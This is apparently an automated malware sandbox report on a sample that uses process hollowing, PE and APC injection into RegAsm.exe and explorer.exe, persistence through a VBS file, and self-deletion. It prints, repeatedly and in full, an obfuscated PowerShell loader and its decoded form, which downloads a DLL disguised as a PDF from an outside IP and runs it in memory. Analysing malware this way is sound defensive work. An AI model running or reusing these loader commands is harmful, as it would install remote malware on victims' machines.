HIPS / PFW / Operating System Protection Evasion
barindex
Sample uses process hollowing technique
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 3E0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: unknown protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B14008 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 106A008
Injects a PE file into a foreign processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread register set: target process: 684 Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Thread register set: target process: 684 Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Thread register set: target process: 2596 Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Thread register set: target process: 4996 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth')) Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth')) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Start-Sleep 5 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Done.vbs" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: explorer.exe, 0000000A.00000000.609946984.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.475258869.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.538172691.0000000006100000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.609946984.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.475258869.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.474834868.0000000000E38000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000000.609946984.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.475258869.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.528330036.0000000001430000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: YProgram Managerf
Source: explorer.exe, 0000000A.00000000.609946984.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.475258869.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.528330036.0000000001430000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
